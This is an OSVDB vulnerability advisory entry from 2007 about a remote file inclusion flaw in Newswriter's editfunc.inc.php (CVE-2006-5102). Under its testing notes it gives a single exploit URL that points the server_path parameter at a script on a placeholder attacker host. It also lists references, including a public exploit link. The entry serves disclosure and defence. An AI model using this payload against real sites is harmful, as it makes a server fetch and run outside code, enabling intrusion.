Newswriter editfunc.inc.php NWCONF_SYSTEM[server_path] Variable Remote File Inclusion

2007-09-27T00:00:00
ID OSVDB:37965
Type osvdb
Reporter OSVDB
Modified 2007-09-27T00:00:00

Description

Manual Testing Notes

http://[target]/[Newswriter_SW_DIR]/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://[attacker]/script.txt?

References:

ISS X-Force ID: 29200 Generic Exploit URL: http://milw0rm.com/exploits/2439 FrSIRT Advisory: ADV-2006-3816 CVE-2006-5102 Bugtraq ID: 20237